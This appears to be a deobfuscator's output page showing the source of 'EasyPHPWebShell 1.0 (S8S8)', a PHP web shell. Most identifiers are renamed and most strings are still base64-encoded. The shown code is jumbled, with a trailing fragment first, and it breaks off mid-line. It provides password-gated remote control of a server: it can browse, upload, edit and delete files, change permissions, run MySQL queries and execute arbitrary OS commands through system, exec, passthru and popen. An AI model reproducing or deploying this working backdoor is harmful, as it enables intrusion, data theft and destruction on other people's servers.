<? if(isset($psta5b)&&!empty($psta5b)){$psta5b=explode(base64_decode('LA=='),$psta5b);$msvh5a=0;while($psta5b[$msvh5a]){echo"<tr bgcolor=\"#CCCCCC\"><td colspan=\"2\">[{$psta5b[$msvh5a]}]:</td></tr>";echo base64_decode('PHRyIGJnY29sb3I9IiNFRUVFRUUiPjx0ZD5HZXRfY2ZnX3ZhcuaWueW8jzwvdGQ+PHRkPg==').wush7($psta5b[$msvh5a],1).base64_decode('PC90ZD48L3RyPg==');echo base64_decode('PHRyIGJnY29sb3I9IiNFRUVFRUUiPjx0ZD5mdW5jdGlvbl9leGlzdHPmlrnlvI88L3RkPjx0ZD4=').wush7($psta5b[$msvh5a],2).base64_decode('PC90ZD48L3RyPg==');echo base64_decode('PHRyIGJnY29sb3I9IiNFRUVFRUUiPjx0ZD5HZXRfbWFnaWNfcXVvdGVzX2dwY+aWueW8jzwvdGQ+PHRkPg==').wush7($psta5b[$msvh5a],3).base64_decode('PC90ZD48L3RyPg==');echo base64_decode('PHRyIGJnY29sb3I9IiNFRUVFRUUiPjx0ZD5HZXRfbWFnaWNfcXVvdGVzX3J1bnRpbWXmlrnlvI88L3RkPjx0ZD4=').wush7($psta5b[$msvh5a],4).base64_decode('PC90ZD48L3RyPg==');echo base64_decode('PHRyIGJnY29sb3I9IiNFRUVFRUUiPjx0ZD5HZXRlbnbmlrnlvI88L3RkPjx0ZD4=').wush7($psta5b[$msvh5a],5).base64_decode('PC90ZD48L3RyPg==');$msvh5a++;}}?>
</table><br>
</td>
</tr>
</table>
<? }else{echo base64_decode('6ZSZ6K+v55qE5o+Q5Lqk5Y+C5pWwPC90ZD48L3RyPjx0cj48dGQgYWxpZ249ImNlbnRlciIgYmdjb2xvcj0iI0VFRUVFRSI+PGJyPjxhIGhyZWY9Ij9hY3Rpb249ZGlyJmRpcj0=').urlencode($hyph18).base64_decode('Ij7ngrnmraTov5Tlm57mlofku7bmtY/op4jpobXpnaI8L2E+PHA+PC90ZD48L3RyPjwvdGFibGU+');}bmnb5();@ob_end_flush();?>
<? function mwkb0(&$susi5c){while(list($dgzl11,$gpfu5d)=each($susi5c)){if((strtoupper($dgzl11)!=$dgzl11||''.intval($dgzl11)=="$dgzl11")&&$dgzl11!=base64_decode('YXJnYw==')&&$dgzl11!=base64_decode('YXJndg==')){if(is_string($gpfu5d))$susi5c[$dgzl11]=stripslashes($gpfu5d);if(is_array($gpfu5d))$susi5c[$dgzl11]=mwkb0($gpfu5d);}}return $susi5c;}function seko1($jofa5e){$xfhy5f=@opendir($jofa5e);while($jtgg60=@readdir($xfhy5f)){if((is_dir("$jofa5e/$jtgg60"))&&($jtgg60!=base64_decode('Lg=='))&&($jtgg60!=base64_decode('Li4='))){if(!seko1("$jofa5e/$jtgg60"))return false;}else if(!is_dir("$jofa5e/$jtgg60")){@chmod("$jofa5e/$jtgg60",0777);if(!@unlink("$jofa5e/$jtgg60"))return false;}}@closedir($xfhy5f);@chmod("$jofa5e",0777);if(!@rmdir($jofa5e))return false;return true;}function lzcl2($doer61,$dnfn62){$xfhy5f=@opendir($doer61);while($jtgg60=@readdir($xfhy5f)){if((is_dir("$doer61/$jtgg60"))&&($jtgg60!=base64_decode('Lg=='))&&($jtgg60!=base64_decode('Li4='))){if(!file_exists("$dnfn62/$jtgg60"))if(!@mkdir("$dnfn62/$jtgg60"))return false;if(!lzcl2("$doer61/$jtgg60","$dnfn62/$jtgg60"))return false;}else if(!is_dir("$doer61/$jtgg60"))if(!@copy("$doer61/$jtgg60","$dnfn62/$jtgg60"))return false;}return true;}function wstv3($scnf63){if(file_exists($scnf63))return true;else{if(wstv3(@dirname($scnf63))){if(@mkdir($scnf63))return true;else return false;}else return false;}}function inxl4(){global $vpqta;$vpqta=explode(base64_decode('IA=='),$vpqta);$eypq64=explode(base64_decode('IA=='),@microtime());return($eypq64[0]-$vpqta[0]+$eypq64[1]-$vpqta[1]);}function bmnb5(){echo base64_decode('PGJyPjxjZW50ZXI+6aG16Z2i5omn6KGM5pe26Ze0Og==').inxl4().base64_decode('IOenkjxicj4=').base64_decode('PHNwYW4gY2xhc3MgPSAic3R5bGVidGV4dDIiPkVhc3lQSFBXZWJTaGVsbCAxLjAoUzhTOOa1i+ivleeJiCk8L3NwYW4+PGJyPuiEmuacrOeUsSA8Yj7nvZHnu5zmioDmnK/orrrlnZsoPGEgaHJlZj0iaHR0cDovL3d3dy5zOHM4Lm5ldCI+aHR0cDovL3d3dy5zOHM4Lm5ldDwvYT4pIFpWKDxhIGhyZWY9Im1haWx0bzp6dnJvcEAxNjMuY29tIj56dnJvcEAxNjMuY29tPC9hPik8L2I+IOe8luWGmTxicj4=').base64_decode('Q29weXJpZ2h0IChDKSAyMDA0IHd3dy5zOHM4Lm5ldCBBbGwgUmlnaHRzIFJlc2VydmVkLjwvY2VudGVyPg==');}function hhoa6($scnf63){return str_replace(base64_decode('XA=='),base64_decode('Lw=='),@realpath($scnf63));}function wush7($huyj65,$ofwy66){global $srld1d,$kpfb1e;$ofoy42=($ofwy66==1)?@get_cfg_var($huyj65):(($ofwy66==2)?@function_exists($huyj65):(($ofwy66==3)?@get_magic_quotes_gpc($huyj65):(($ofwy66==4)?@get_magic_quotes_runtime($huyj65):(($ofwy66==5)?@Getenv($huyj65):base64_decode('ZXJyb3Ih')))));return($ofoy42==1)?$srld1d:(($ofoy42==0)?$kpfb1e:$ofoy42);}function nbcj8($vykb67){return $vykb67==base64_decode('I0NDQ0NDQw==')?base64_decode('I0VFRUVFRQ=='):base64_decode('I0NDQ0NDQw==');}function deyv9(){?>
<br><br><br><br><br><br><br>
<table align="center" width="300" border="0" cellpadding="0" cellspacing="0">
<tr>
<td align="center" bgcolor="#000000" class="stylebtext3">
,
</td>
</tr>
<tr>
<form method="post" action="?action=login" enctype="multipart/form-data">
<td align="center" class="style1"><br>
<input name="pmy_password" type="password" size="30" class="style1"><p>
<input name="pmy_passwordb" type="submit" value=" " class="style1"><p>
</td>
</tr>
</table>
<? exit;} ?>
Did this file decode correctly?
Original Code
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>EasyPHPWebShell(S8S8)</title>
<style type="text/css">
<!--
body,td,th, h1, h2 {
font-size: 12px;
font-family: sans-serif;
}
body {background-color: #F8F8F8;}
.style1 {
font-size: 12px;
font-family: verdana, helvetica, sans-serif, ;
vertical-align: middle;
border: 1px solid #000000;
}
.stylebtext2 {color: #990000;font-weight: bold;}
.stylebtext3 {color: #FFFFFF;font-weight: bold;}
a:link,a:visited,a:active {color:#336699; text-decoration: underline;}
a:hover {COLOR: #990000;text-decoration: none;}
table {border-collapse: collapse;}
td, th { border: 1px solid #000000;}
-->
</style>
<?php @set_time_limit(0);@error_reporting(E_ERROR|E_WARNING|E_PARSE);@ob_start();$vpqta=microtime();if(get_magic_quotes_gpc()){$_GET=mwkb0($_GET);$_POST=mwkb0($_POST);}$lsyqb=0;$sndoc=base64_decode('NTA2NTMzOA==');$shced=24;?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>EasyPHPWebShell(S8S8)</title>
<style type="text/css">
<!--
body,td,th, h1, h2 {
font-size: 12px;
font-family: sans-serif;
}
body {background-color: #F8F8F8;}
.style1 {
font-size: 12px;
font-family: verdana, helvetica, sans-serif, ;
vertical-align: middle;
border: 1px solid #000000;
}
.stylebtext2 {color: #990000;font-weight: bold;}
.stylebtext3 {color: #FFFFFF;font-weight: bold;}
a:link,a:visited,a:active {color:#336699; text-decoration: underline;}
a:hover {COLOR: #990000;text-decoration: none;}
table {border-collapse: collapse;}
td, th { border: 1px solid #000000;}
-->
</style>
<? if($lsyqb==1){@session_start();if($_GET[base64_decode('YWN0aW9u')]==base64_decode('bG9nb3V0')){@hygoe(base64_decode('c215X3Bhc3N3b3Jk'));@session_destroy();@setcookie(base64_decode('Y215X3Bhc3N3b3Jk'),'');echo"<script>function redirect(){window.location.replace(\"{$_SERVER[base64_decode('UEhQX1NFTEY=')]}\");}redirect();</script>";}if($_GET[base64_decode('YWN0aW9u')]==base64_decode('bG9naW4=')){if($sndoc==$_POST[base64_decode('cG15X3Bhc3N3b3Jk')]){@avqof(base64_decode('c215X3Bhc3N3b3Jk'));$_SESSION[base64_decode('c215X3Bhc3N3b3Jk')]=$sndoc;@setcookie(base64_decode('Y215X3Bhc3N3b3Jk'),$sndoc,time()+(3600*$shced));echo"<script>function redirect(){window.location.replace(\"{$_SERVER[base64_decode('UEhQX1NFTEY=')]}\");}redirect();</script>";}}if(@vzob10(base64_decode('c215X3Bhc3N3b3Jk'))||isset($_COOKIE[base64_decode('Y215X3Bhc3N3b3Jk')])){if(($_SESSION[base64_decode('c215X3Bhc3N3b3Jk')]!=$sndoc)&&(!isset($_COOKIE[base64_decode('Y215X3Bhc3N3b3Jk')])||$_COOKIE[base64_decode('Y215X3Bhc3N3b3Jk')]!=$sndoc))deyv9();}else deyv9();}if(!@get_cfg_var(base64_decode('cmVnaXN0ZXJfZ2xvYmFscw=='))){foreach($_GET as $dgzl11=>$txfp12)$$dgzl11=$txfp12;foreach($_POST as $dgzl11=>$txfp12)$$dgzl11=$txfp12;foreach($_FILES as $dgzl11=>$txfp12)$$dgzl11=$txfp12;}if(isset($nouo13)){if(!file_exists($nouo13))$uoli14=base64_decode('5rKh5om+5Yiw5paH5Lu2');else{$lowq15=basename($nouo13);$ywwe16=fopen($nouo13,base64_decode('cmI='));if($ywwe16==false)$uoli14=base64_decode('5omT5byA5paH5Lu26ZSZ6K+v');else{Header(base64_decode('Q29udGVudC10eXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0='));Header(base64_decode('QWNjZXB0LVJhbmdlczogYnl0ZXM='));Header(base64_decode('QWNjZXB0LUxlbmd0aDog').filesize($nouo13));Header(base64_decode('Q29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9').$lowq15);echo fread($ywwe16,filesize($nouo13));fclose($ywwe16);exit;}}}if(isset($cimr17))if($cimr17!='')$hyph18=$cimr17;if(!isset($wrrc19)){$wrrc19=base64_decode('ZGly');$hyph18=base64_decode('Lg==');}if(!isset($hyph18))$hyph18=base64_decode('Lg==');$fkbz1a=str_replace(base64_decode('XFw='),base64_decode('Lw=='),$_SERVER[base64_decode('RE9DVU1FTlRfUk9PVA==')]);if(isset($tpob1b))$hyph18=hhoa6($hyph18);else if(isset($biay1c)){$hyph18=hhoa6($hyph18);if(strstr($hyph18,$fkbz1a))$hyph18=str_replace("$fkbz1a",base64_decode('Lg=='),$hyph18);else $hyph18=base64_decode('Lg==');}$srld1d=base64_decode('PGZvbnQgY29sb3I9Z3JlZW4+PGI+4pagPC9iPjwvZm9udD4=');$kpfb1e=base64_decode('PGZvbnQgY29sb3I9cmVkPjxiPuKWoDwvYj48L2ZvbnQ+');?>
<SCRIPT LANGUAGE="JavaScript">
function rusuredel(msg,url){
smsg = "()[" + msg + "]?";
if (confirm(smsg)){
url = url + msg;
window.location = url;
}
}
function rusurechk(msg,url){
smsg = "(,)[" + msg + "],(,):";
re = prompt(smsg,msg);
if (re){
url = url + re;
window.location = url;
}
}
</script>
</head>
<body>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td align="center" width="100%" bgcolor="#000000" class="stylebtext3">
EasyPHPWebShell 1.0(S8S8)
</td>
</tr>
<tr>
<td align="center" bgcolor="#EEEEEE">
:<? $uzyn1f=str_replace(base64_decode('XA=='),base64_decode('Lw=='),__FILE__);echo"<a href=\"$HTTP_SERVER_VARS[PHP_SELF]\">$uzyn1f</a>";?><a href="?action=logout"></a>
</td>
</tr>
<tr>
<td align="center" bgcolor="#EEEEEE"><a href="?action=dir&dir=."></a><a href="?action=editfile&dir=<?=urlencode($hyph18);?>&editfile=<?=urlencode($hyph18);?>/"></a><a href="?action=sql"></a><a href="?action=shell">Shell</a><a href="?action=env"></a><a href="?action=phpinfo">PHP</a><a href="http://www.s8s8.net/forums/index.php?showtopic=15998"></a>
</td>
</tr>
</table>
<br>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="100%" bgcolor="#000000" align="center" class="stylebtext3">
<? if($wrrc19==base64_decode('ZGly')){?>
</td>
</tr>
<tr>
<form method="post" action="?action=dir&dir=<?=urlencode($hyph18);?>" enctype="multipart/form-data">
<td bgcolor="#EEEEEE"> :
<input name="gotodir" type="text" class="style1" value="<?=$hyph18?>" size="60">
<input name="gotodirb" type="submit" class="style1" value=""><? if($hyph18[1]==base64_decode('Og=='))echo base64_decode('44CQPGEgaHJlZj0iP2FjdGlvbj1kaXImZGlyPQ==').urlencode($hyph18).base64_decode('JnVuYWJzcGF0aD0xIj7ngrnmraTnlKg8Yj7nm7jlr7k8L2I+6Lev5b6E5p+l55yLPC9hPuOAkSZuYnNwOw==');else echo base64_decode('44CQPGEgaHJlZj0iP2FjdGlvbj1kaXImZGlyPQ==').urlencode($hyph18).base64_decode('JmFic3BhdGg9MSI+54K55q2k55SoPGI+57ud5a+5PC9iPui3r+W+hOafpeecizwvYT7jgJEmbmJzcDs=');?>
</td>
</form>
</tr>
<tr>
<form method="post" action="?action=fileup&dir=<?=urlencode($hyph18);?>" enctype="multipart/form-data">
<td bgcolor="#EEEEEE"> ():
<input name="filedir" type="text" class="style1" value="<?=$hyph18?>" size="30"> :
<input name="userfile" type="file" class="style1" size="30">
<input name="userfileb" type="submit" class="style1" value="">
</td>
</form>
</tr>
<tr>
<form method="post" action="?action=filecreate&dir=<?=urlencode($hyph18);?>" enctype="multipart/form-data">
<td bgcolor="#EEEEEE"> ():
<input name="mkname" type="text" value="" size=30 class="style1">
<input name="mkfileb" type="submit" value="" class="style1">
<input name="mkdirb" type="submit" value="" class="style1"> :<b><? $xxxn20=base64_decode('5LiN5Y+v5YaZ');if(is_dir($hyph18)){if($mhmo21=@fopen("$hyph18/temp.tmp",base64_decode('dw=='))){@fclose($mhmo21);@unlink("$hyph18/temp.tmp");$xxxn20=base64_decode('5Y+v5YaZ');}}echo"$xxxn20</b>";?>
</td>
</tr>
</table>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr bgcolor="#000000" class="stylebtext3">
<td width="25%"></td>
<td width="40%">|</td>
<td width="10%">(KB)</td>
<td width="8%"></td>
<td width="17%"></td>
</tr>
<?php $sawf22=0;$mhrk23=0;$rweh24=base64_decode('I0VFRUVFRQ==');$vpsv25=@opendir($hyph18);while($dewj26=@readdir($vpsv25)){if(@is_dir("$hyph18/$dewj26")){$ehjb27=base64_decode('LQ==');$nlmd28=base64_decode('LQ==');$nxms29=base64_decode('LQ==');$epeo2a=base64_decode('LQ==');$shrj2b=base64_decode('LQ==');if($dewj26==base64_decode('Li4=')){if($hyph18==base64_decode('Lg=='))continue;$goqg2c=@dirname($hyph18);if($hyph18[1]==base64_decode('Og==')){$goqg2c=hhoa6($goqg2c);if(strlen($goqg2c)<=3)$goqg2c=substr($goqg2c,0,2);}$erza2d=base64_decode('4pazIA==');$dewj26=base64_decode('5LiK57qn55uu5b2V');}else if($dewj26==base64_decode('Lg==')){if($hyph18==base64_decode('Lg=='))continue;$hyph18[1]==base64_decode('Og==')?$goqg2c=substr(hhoa6($goqg2c),0,2):$goqg2c=$dewj26;$erza2d=base64_decode('4peLIA==');$dewj26=base64_decode('5qC557qn55uu5b2V');}else{$ehjb27=base64_decode('W0RJUl0=');$goqg2c="$hyph18/$dewj26";$nlmd28=@date(base64_decode('WS1uLWQgSDppOnM='),@filectime("$goqg2c"));$nxms29=@date(base64_decode('WS1uLWQgSDppOnM='),@filemtime("$goqg2c"));$shrj2b=substr(@base_convert(@fileperms($goqg2c),10,8),-4);$erza2d=base64_decode('4pahIA==');$vqxf2e="[$dewj26]";$epeo2a="[<a href=\"\" title=\"\" onClick=\"rusuredel('$goqg2c','?action=filedel&dir=$hyph18&deldir=');return false;\"></a>|"."<a href=\"\" title=\"\" onClick=\"rusurechk('$goqg2c','?action=filerename&dir=$hyph18&renamef=$goqg2c&renamet=');return false;\"></a>|"."<a href=\"\" title=\"\" onClick=\"rusurechk('$goqg2c','?action=filecopy&dir=$hyph18©dirf=$goqg2c©dirt=');return false;\"></a>|"."<a href=\"\" title=\"\" onClick=\"rusurechk('$shrj2b','?action=filetype&dir=$hyph18&ctype=');return false;\"></a>]";$mhrk23++;}$rweh24=nbcj8($rweh24);echo"<tr bgcolor=\"$rweh24\">"."<td width=\"25%\">$erza2d [<a href=\"?action=dir&dir=$goqg2c\" title = \"\">$dewj26</a>]</td>"."<td width=\"40%\">[$nlmd28|$nxms29]</td>"."<td width=\"10%\">$ehjb27</td>"."<td width=\"8%\">$shrj2b</td>"."<td width=\"17%\">$epeo2a</td>".base64_decode('PC90cj4=');}}@closedir($vpsv25);$vpsv25=@opendir($hyph18);while($dewj26=@readdir($vpsv25)){if(!@is_dir("$hyph18/$dewj26")&&$dewj26!=base64_decode('Li4=')){$shrj2b=substr(@base_convert(@fileperms("$hyph18/$dewj26"),10,8),-4);$epeo2a="[<a href=\"\" title=\"\" onClick=\"rusuredel('$hyph18/$dewj26','?action=filedel&dir=$hyph18&delfile=');return false;\"></a>|"."<a href=\"\" title=\"\" onClick=\"rusurechk('$hyph18/$dewj26','?action=filerename&dir=$hyph18&renamef=$hyph18/$dewj26&renamet=');return false;\"></a>|"."<a href=\"\" title=\"\" onClick=\"rusurechk('$hyph18/$dewj26','?action=filecopy&dir=$hyph18©filef=$hyph18/$dewj26©filet=');return false;\"></a>|"."<a href=\"\" title=\"\" onClick=\"rusurechk('$shrj2b','?action=filetype&dir=$hyph18&cfile=$hyph18/$dewj26&ctype=');return false;\"></a>|"."<a href=\"?action=dir&df_path=$hyph18/$dewj26\" title=\"\"></a>|"."<a href=\"?action=editfile&dir=$hyph18&editfile=$hyph18/$dewj26\" title=\"\"></a>]";$rweh24=nbcj8($rweh24);echo"<tr bgcolor=\"$rweh24\">"."<td width=\"25%\"> <a href=\"$hyph18/$dewj26\" title = \"\" target=\"_blank\">$dewj26</a></td>".base64_decode('PHRkIHdpZHRoPSI0MCUiPls=').@date(base64_decode('WS1uLWQgSDppOnM='),@filectime("$hyph18/$dewj26")).base64_decode('fA==').@date(base64_decode('WS1uLWQgSDppOnM='),@filemtime("$hyph18/$dewj26")).base64_decode('XTwvdGQ+').base64_decode('PHRkIHdpZHRoPSIxMCUiPg==').@number_format(@filesize("$hyph18/$dewj26")/1024,3).base64_decode('PC90ZD4=').base64_decode('PHRkIHdpZHRoPSI4JSI+').$shrj2b.base64_decode('PC90ZD4=')."<td width=\"17%\">$epeo2a</td>".base64_decode('PC90cj4=');$sawf22++;}}@closedir($vpsv25);?>
<tr bgcolor="#000000" class="stylebtext3" align="center">
<td width="25%" colspan="5">:<?=$mhrk23?>,:<?=$sawf22?></td>
</tr>
</table>
<? }else if($wrrc19==base64_decode('ZWRpdGZpbGU=')){?>
()
</td>
</tr>
<tr>
<form method="post" action="?action=filesave&dir=<?=urlencode($hyph18);?>" enctype="multipart/form-data">
<td align="center" valign="top" bgcolor="#EEEEEE">:
<input name="editfilename" type="text" class="style1" value="<?=$plvq2f?>" size="30">
<input name="editbackfile" type="checkbox" value="1" class="style1">(.bak)<br>
<textarea name="editfiletext" cols="120" rows="25" class="style1"><? $jguu30=@fopen($plvq2f,base64_decode('cmI='));$jguu30==false?$luwp31=base64_decode('6K+75Y+W5paH5Lu26ZSZ6K+vKOaIluWwmuacquivu+WPluaWh+S7tiku'):$luwp31=@fread($jguu30,filesize($plvq2f));@fclose($jguu30);$luwp31=htmlspecialchars($luwp31);echo"$luwp31";?></textarea><p>
<input name="editfileb" type="submit" value="" class="style1">
<input name="editagainb" type="reset" value="" class="style1">
<a href="?action=dir&dir=<?=urlencode($hyph18);?>"></a>
<p>
</td>
</form>
</tr>
</table>
<? }else if(base64_decode('c3Fs')==substr($wrrc19,0,3)){?>
</td>
</tr>
<tr>
<form method="post" action="?action=sql" enctype="multipart/form-data">
<td align="center" valign="top" bgcolor="#EEEEEE">
:<input name="sqlhost" type="text" class="style1" value="<?=isset($lita32)?$lita32:base64_decode('bG9jYWxob3N0')?>" size="20">
:<input name="sqlport" type="text" class="style1" value="<?=isset($crgb33)?$crgb33:base64_decode('MzMwNg==')?>" size="5">
:<input name="sqluser" type="text" class="style1" value="<?=isset($qaok34)?$qaok34:base64_decode('cm9vdA==')?>" size="10">
:<input name="sqlpasd" type="text" class="style1" value="<?=isset($yqev35)?$yqev35:''?>" size="10">
:<input name="sqldb" type="text" class="style1" value="<?=isset($zggo36)?$zggo36:''?>" size="10"><br>
<textarea name="sqlcmdtext" cols="120" rows="10" class="style1"><? if(!empty($jkqr37)){@hwil38("{$lita32}:{$crgb33}","$qaok34","$yqev35")or die(base64_decode('5pWw5o2u5bqT6L+e5o6l5aSx6LSl'));@zflf39("$zggo36")or die(base64_decode('6YCJ5oup5pWw5o2u5bqT5aSx6LSl'));$gfxy3a=@hssg3b("$jkqr37");echo $jkqr37;ixdj3c();}?></textarea><p>
<span class="stylebtext2"><? echoisset($wasr3d)?($gfxy3a?base64_decode('5omn6KGM5oiQ5YqfLg=='):base64_decode('5omn6KGM5aSx6LSlOg==').tphi3e()):'';?></span><p>
<input name="sqlcmdb" type="submit" value="" class="style1">
<input name="sqlagainb" type="reset" value="" class="style1">
<p>
</td>
</form>
</tr>
</table>
<? }else if(base64_decode('c2hlbGw=')==substr($wrrc19,0,5)){?>
Shell
</td>
</tr>
<tr>
<form method="post" action="?action=shell" enctype="multipart/form-data">
<td align="center" valign="top" bgcolor="#EEEEEE">
:<select name="seletefunc" class="input">
<option value="system" <?=($hlds3f==base64_decode('c3lzdGVt'))?base64_decode('c2VsZWN0ZWQ='):'';?>>system</option>
<option value="exec" <?=($hlds3f==base64_decode('ZXhlYw=='))?base64_decode('c2VsZWN0ZWQ='):'';?>>exec</option>
<option value="shell_exec" <?=($hlds3f==base64_decode('c2hlbGxfZXhlYw=='))?base64_decode('c2VsZWN0ZWQ='):'';?>>shell_exec</option>
<option value="passthru" <?=($hlds3f==base64_decode('cGFzc3RocnU='))?base64_decode('c2VsZWN0ZWQ='):'';?>>passthru</option>
<option value="popen" <?=($hlds3f==base64_decode('cG9wZW4='))?base64_decode('c2VsZWN0ZWQ='):'';?>>popen</option>
</select>
:<input name="shellcmd" type="text" class="style1" value="<?=isset($tchz40)?$tchz40:''?>" size="80">
<textarea name="shelltext" cols="120" rows="10" class="style1"><? if(!empty($tchz40)){if($hlds3f==base64_decode('cG9wZW4=')){$bfgx41=popen($tchz40,base64_decode('cg=='));echo fread($bfgx41,2096);pclose($bfgx41);}else{echo $ofoy42=(base64_decode('c3lzdGVt')==$hlds3f)?system($tchz40):(($hlds3f==base64_decode('ZXhlYw=='))?exec($tchz40):(($hlds3f==base64_decode('c2hlbGxfZXhlYw=='))?shell_exec($tchz40):(($hlds3f==base64_decode('cGFzc3RocnU='))?passthru($tchz40):system($tchz40))));}}?></textarea><p>
<span class="stylebtext2"><? echo get_cfg_var(base64_decode('c2FmZV9tb2Rl'))?base64_decode('5o+Q56S6OuWuieWFqOaooeW8j+S4i+WPr+iDveaXoOazleaJp+ihjA=='):'';?></span><p>
<input name="shellcmdb" type="submit" value="" class="style1">
<input name="shellagainb" type="reset" value="" class="style1">
<p>
</td>
</form>
</tr>
</table>
<? }else if($wrrc19==base64_decode('cGhwaW5mbw==')){?>
PHP
</td>
</tr>
<tr>
<td align="center" bgcolor="#EEEEEE" class="stylebtext2"><br><? phpinfo();if(wimq43(base64_decode('cGhwaW5mbw=='),get_cfg_var(base64_decode('ZGlzYWJsZV9mdW5jdGlvbnM='))))echo base64_decode('PGI+cGhwaW5mb+WHveaVsOiiq+emgeatojwvYj48YnI+');?><br>
</td>
</tr>
</table>
<? }else if(base64_decode('ZmlsZQ==')==substr($wrrc19,0,4)){?>
</td>
</tr>
<tr>
<td align="center" bgcolor="#EEEEEE" class="stylebtext2">
<br>
<? if($wrrc19==base64_decode('ZmlsZXNhdmU=')){if(isset($snhd44)&&isset($gbvf45)){if(isset($dfov46)&&($dfov46==1))echo $ofoy42=@copy($gbvf45,$gbvf45.base64_decode('LmJhaw=='))?base64_decode('55Sf5oiQ5aSH5Lu95paH5Lu25oiQ5YqfLjxwPg=='):base64_decode('55Sf5oiQ5aSH5Lu95paH5Lu25oiQ5YqfPHA+');$jguu30=@fopen($gbvf45,base64_decode('dw=='));if($jguu30==false)echo"[$gbvf45].";else{echo $ofoy42=@fwrite($jguu30,$cnfz47)?"[$gbvf45]!":"[$gbvf45]";@fclose($jguu30);}}}else if($wrrc19==base64_decode('ZmlsZWRlbA==')){if(isset($hdgt48)){echo $ofoy42=file_exists($hdgt48)?(seko1($hdgt48)?"[$hdgt48]!":"[$hdgt48]!"):"[$hdgt48]!!";}else if(isset($hrzt49)){@chmod("$hrzt49",0777);echo $ofoy42=file_exists($hrzt49)?(@unlink($hrzt49)?"[$hrzt49]!":"[$hrzt49]!"):"[$hrzt49]!";}}else if($wrrc19==base64_decode('ZmlsZXJlbmFtZQ==')){echo $ofoy42=file_exists($gobq4a)?(@rename($gobq4a,$phxk4b)?"[$gobq4a][{$phxk4b}]":"[$gobq4a][{$phxk4b}]"):"[$gobq4a]!";}else if($wrrc19==base64_decode('ZmlsZWNvcHk=')){if(isset($qtro4c)&&isset($wbed4d)){echo $ofoy42=file_exists($qtro4c)?(wstv3($wbed4d)?(lzcl2($qtro4c,$wbed4d)?"[$qtro4c][$wbed4d]":"[$qtro4c][$wbed4d]"):"[$wbed4d]"):"[$qtro4c]!";}else if(isset($lscz4e)&&isset($nfoc4f)){echo $ofoy42=file_exists($lscz4e)?(wstv3(dirname($nfoc4f))?(@copy($lscz4e,$nfoc4f)?"[$lscz4e][$nfoc4f]":"[$lscz4e][$nfoc4f]"):base64_decode('55uu5qCH55uu5b2V5LiN5a2Y5Zyo5LiU5Yib5bu66ZSZ6K+v')):"[$lscz4e]!";}}else if($wrrc19==base64_decode('ZmlsZWNyZWF0ZQ==')){if(isset($qziw50)){echo $ofoy42=file_exists("$hyph18/$totk51")?"[{$hyph18}/{$totk51}]":(@mkdir("$hyph18/$totk51",0777)?"[$totk51]":"[$totk51]");}else if(isset($qind52)){if(file_exists("$hyph18/$totk51"))echo"[$hyph18/$totk51]";else{$jguu30=@fopen("$hyph18/$totk51",base64_decode('dw=='));if($jguu30==false)echo"[$totk51].";else{echo"[$totk51] <a href=\"?action=editfile&dir=".urlencode($hyph18).base64_decode('JmVkaXRmaWxlPQ==').urlencode($hyph18).base64_decode('Lw==').urlencode($totk51).base64_decode('Ij48cD7ngrnmraTot7PovazlhaXnvJbovpHmtY/op4jpobXpnaI8L2E+');@fclose($jguu30);}}}}else if($wrrc19==base64_decode('ZmlsZXR5cGU=')){echo $ofoy42=@chmod($suyl53,base_convert($bgwh54,8,10))?base64_decode('5pu05pS55oiQ5YqfIQ=='):base64_decode('5pu05pS55aSx6LSlIQ==');}else if($wrrc19==base64_decode('ZmlsZXVw')){echo $ofoy42=@copy($lpfz55[base64_decode('dG1wX25hbWU=')],"{$tzqg56}/{$lpfz55[base64_decode('bmFtZQ==')]}")?"[{$lpfz55[base64_decode('bmFtZQ==')]}].:[{$tzqg56}/{$lpfz55[base64_decode('bmFtZQ==')]}]({$lpfz55[base64_decode('c2l6ZQ==')]}).":"[{$lpfz55[base64_decode('bmFtZQ==')]}]";}else{echo base64_decode('6ZSZ6K+v55qE5o+Q5Lqk5Y+C5pWwYWN0aW9uLg==');}?>
<p>
<a href="?action=dir&dir=<?=urlencode($hyph18);?>"></a>
<p>
</td>
</tr>
</table>
<? }else if($wrrc19==base64_decode('ZW52')){?>
<?=$srld1d?> <?=$kpfb1e?><br>
</td>
</tr>
<? $lgxq57[0]=array(base64_decode('5Li75py65Z+f5ZCNOg=='),$_SERVER[base64_decode('U0VSVkVSX05BTUU=')]);$lgxq57[1]=array(base64_decode('5Li75py6SVA6'),gethostbyname($_SERVER[base64_decode('U0VSVkVSX05BTUU=')]));$lgxq57[2]=array(base64_decode('5Li75py656uv5Y+jOg=='),$_SERVER[base64_decode('U0VSVkVSX1BPUlQ=')]);$lgxq57[3]=array(base64_decode('5Li75py65pe26Ze0Og=='),date(base64_decode('WS9tL2RfaDppOnM='),time()));$lgxq57[4]=array(base64_decode('5Li75py657O757ufOg=='),PHP_OS);$lgxq57[5]=array(base64_decode('5Li75py6V0VC5pyN5Yqh5Zmo'),$_SERVER[base64_decode('U0VSVkVSX1NPRlRXQVJF')]);$lgxq57[6]=array(base64_decode('UEhQ54mI5pysOg=='),PHP_VERSION);$lgxq57[7]=array(base64_decode('5Ymp5L2Z56m66Ze0Og=='),intval(diskfreespace(base64_decode('Lg=='))/(1024*1024).base64_decode('TUI=')));$lgxq57[8]=array(base64_decode('5Li75py66K+t6KiA'),$_SERVER[base64_decode('SFRUUF9BQ0NFUFRfTEFOR1VBR0U=')]);$lgxq57[9]=array(base64_decode('5b2T5YmN55So5oi3'),get_current_user());$lgxq57[10]=array(base64_decode('5pyA5aSn5YaF5a2Y5Y2g55SoOg=='),wush7(base64_decode('bWVtb3J5X2xpbWl0'),1));$lgxq57[11]=array(base64_decode('5pyA5aSn5Y2V5Liq5LiK5Lyg5paH5Lu2'),wush7(base64_decode('dXBsb2FkX21heF9maWxlc2l6ZQ=='),1));$lgxq57[12]=array(base64_decode('UE9TVOacgOWkp+WuuemHjw=='),wush7(base64_decode('cG9zdF9tYXhfc2l6ZQ=='),1));$lgxq57[13]=array(base64_decode('6ISa5pys6LaF5pe2'),wush7(base64_decode('bWF4X2V4ZWN1dGlvbl90aW1l'),1));$lgxq57[14]=array(base64_decode('5bGP6JS955qE5Ye95pWw'),w